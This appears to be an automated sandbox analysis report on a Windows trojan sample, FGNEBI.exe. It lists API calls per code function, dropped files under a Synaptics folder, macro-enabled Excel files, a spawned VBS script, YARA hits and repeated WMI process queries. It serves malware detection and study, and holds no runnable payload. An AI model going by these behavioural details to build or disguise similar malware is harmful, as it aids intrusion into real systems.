Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DFF594 GetWindowLongW,NtdllDialogWndProc_W,	2_2_00DFF594
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DAB7F2 NtdllDialogWndProc_W,	2_2_00DAB7F2
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DAB845 NtdllDialogWndProc_W,	2_2_00DAB845
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DFFE80 NtdllDialogWndProc_W,	2_2_00DFFE80
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DFFF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,	2_2_00DFFF91
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DFFF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,	2_2_00DFFF04
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_001E29C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,	10_2_001E29C2
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_002502AA NtdllDialogWndProc_W,	10_2_002502AA
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0024E769 NtdllDialogWndProc_W,CallWindowProcW,	10_2_0024E769
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0024EA4E NtdllDialogWndProc_W,	10_2_0024EA4E
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0024EAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,	10_2_0024EAA6
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_001FAC99 NtdllDialogWndProc_W,	10_2_001FAC99
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0024ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,	10_2_0024ECBC
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_001FAD5C NtdllDialogWndProc_W,74B1C8D0,NtdllDialogWndProc_W,	10_2_001FAD5C
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0024EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,	10_2_0024EFA8
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_001FAFB4 GetParent,NtdllDialogWndProc_W,	10_2_001FAFB4
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0024F0A1 SendMessageW,NtdllDialogWndProc_W,	10_2_0024F0A1
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0024F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	10_2_0024F122
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0024F37C NtdllDialogWndProc_W,	10_2_0024F37C
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0024F3AB NtdllDialogWndProc_W,	10_2_0024F3AB
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0024F3DA NtdllDialogWndProc_W,	10_2_0024F3DA
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0024F425 NtdllDialogWndProc_W,	10_2_0024F425
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0024F45A ClientToScreen,NtdllDialogWndProc_W,	10_2_0024F45A
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0024F594 GetWindowLongW,NtdllDialogWndProc_W,	10_2_0024F594
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0024F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	10_2_0024F5D0
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_001FB7F2 NtdllDialogWndProc_W,	10_2_001FB7F2
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_001FB845 NtdllDialogWndProc_W,	10_2_001FB845
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0024FE80 NtdllDialogWndProc_W,	10_2_0024FE80
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0024FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,	10_2_0024FF04
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0024FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,	10_2_0024FF91

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Code function: 2_2_00DD70AE: CreateFileW,DeviceIoControl,CloseHandle,

2_2_00DD70AE

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Code function: 2_2_00DCB9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74BC5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,

2_2_00DCB9F1

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DD82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		2_2_00DD82D0
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_002282D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		10_2_002282D0

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DF30AD	2_2_00DF30AD
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DA3680	2_2_00DA3680
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00D9DCD0	2_2_00D9DCD0
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00D9A0C0	2_2_00D9A0C0
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DB0183	2_2_00DB0183
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DD220C	2_2_00DD220C
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00D98530	2_2_00D98530
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00D96670	2_2_00D96670
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DB0677	2_2_00DB0677
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DC8779	2_2_00DC8779
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DFA8DC	2_2_00DFA8DC
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DB0A8F	2_2_00DB0A8F
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00D96BBC	2_2_00D96BBC
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DBAC83	2_2_00DBAC83
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00D98CA0	2_2_00D98CA0
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DAAD5C	2_2_00DAAD5C
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DB0EC4	2_2_00DB0EC4
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DC4EBF	2_2_00DC4EBF
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DC113E	2_2_00DC113E
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DB12F9	2_2_00DB12F9
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DC542F	2_2_00DC542F
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DFF5D0	2_2_00DFF5D0
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DC599F	2_2_00DC599F
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DBDA74	2_2_00DBDA74
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00D9BDF0	2_2_00D9BDF0
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DBBDF6	2_2_00DBBDF6
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00D95D32	2_2_00D95D32
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DB1E5A	2_2_00DB1E5A
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DC7FFD	2_2_00DC7FFD
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DDBFB8	2_2_00DDBFB8
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DBDF69	2_2_00DBDF69
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_001EDCD0	10_2_001EDCD0
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_001EA0C0	10_2_001EA0C0
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_00200183	10_2_00200183
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0022220C	10_2_0022220C
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_001E8530	10_2_001E8530
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_00200677	10_2_00200677
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_001E6670	10_2_001E6670
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_00218779	10_2_00218779
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0024A8DC	10_2_0024A8DC
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_00200A8F	10_2_00200A8F
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_001E6BBC	10_2_001E6BBC
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0020AC83	10_2_0020AC83
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_001E8CA0	10_2_001E8CA0
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_001FAD5C	10_2_001FAD5C
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_00214EBF	10_2_00214EBF
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_00200EC4	10_2_00200EC4
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_002430AD	10_2_002430AD
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0021113E	10_2_0021113E
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_002012F9	10_2_002012F9
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0021542F	10_2_0021542F
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0024F5D0	10_2_0024F5D0
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_001F3680	10_2_001F3680
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0021599F	10_2_0021599F
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0020DA74	10_2_0020DA74
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_001E5D32	10_2_001E5D32
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0020BDF6	10_2_0020BDF6
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_001EBDF0	10_2_001EBDF0
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_00201E5A	10_2_00201E5A
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0020DF69	10_2_0020DF69
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0022BFB8	10_2_0022BFB8
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_00217FFD	10_2_00217FFD

Source: JUIlYPbf.xlsm.3.dr	OLE, VBA macro line: Private Sub Workbook_Open()
Source: JUIlYPbf.xlsm.3.dr	OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
Source: GAOBCVIQIJ.xlsm.3.dr	OLE, VBA macro line: Private Sub Workbook_Open()
Source: GAOBCVIQIJ.xlsm.3.dr	OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)

Source: Joe Sandbox View

Dropped File: C:\ProgramData\Synaptics\RCX5CF5.tmp 5A2B9944F9C900ABFBBF22B605A6D1770FC3C75456FFF3C0517CAA102C5D8F07

Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: String function: 001FF885 appears 68 times
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: String function: 00207750 appears 42 times
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: String function: 00DAF885 appears 68 times
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: String function: 00DB7750 appears 42 times

Source: C:\ProgramData\Synaptics\Synaptics.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 2908

Source: FGNEBI.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Source: FGNEBI.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: Synaptics.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Source: Synaptics.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: RCX5CF5.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: ~$cache1.3.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

Source: FGNEBI.exe, 00000000.00000000.1399677835.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs FGNEBI.exe
Source: FGNEBI.exe, 00000000.00000000.1399766047.00000000004A5000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameb! vs FGNEBI.exe
Source: FGNEBI.exe, 00000000.00000003.1408140312.00000000006D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs FGNEBI.exe
Source: FGNEBI.exe, 00000000.00000003.1408140312.00000000006D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameX vs FGNEBI.exe
Source: FGNEBI.exe, 00000000.00000003.1408098370.0000000002320000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameb! vs FGNEBI.exe
Source: FGNEBI.exe	Binary or memory string: OriginalFileName vs FGNEBI.exe
Source: FGNEBI.exe	Binary or memory string: OriginalFilenameb! vs FGNEBI.exe

Source: FGNEBI.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: classification engine

Classification label: mal100.troj.expl.evad.winEXE@24/29@4/4

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Code function: 2_2_00DDD712 GetLastError,FormatMessageW,

2_2_00DDD712

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DCB8B0 AdjustTokenPrivileges,CloseHandle,	2_2_00DCB8B0
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DCBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	2_2_00DCBEC3
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0021B8B0 AdjustTokenPrivileges,CloseHandle,	10_2_0021B8B0
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0021BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	10_2_0021BEC3

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Code function: 2_2_00DDEA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

2_2_00DDEA85

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Code function: 2_2_00DD6F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,

2_2_00DD6F5B

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Code function: 2_2_00DDEFCD CoInitialize,CoCreateInstance,CoUninitialize,

2_2_00DDEFCD

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Code function: 2_2_00D931F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

2_2_00D931F2

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml

Jump to behavior

Source: C:\Users\user\Desktop\FGNEBI.exe

File created: C:\Users\user\Desktop\._cache_FGNEBI.exe

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8036
Source: C:\ProgramData\Synaptics\Synaptics.exe	Mutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

File created: C:\Users\user\AppData\Local\Temp\WLJOQW.vbs

Jump to behavior

Source: Yara match	File source: FGNEBI.exe, type: SAMPLE
Source: Yara match	File source: 0.0.FGNEBI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1399677835.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\Synaptics\RCX5CF5.tmp, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\~$cache1, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs

Source: C:\Users\user\Desktop\FGNEBI.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
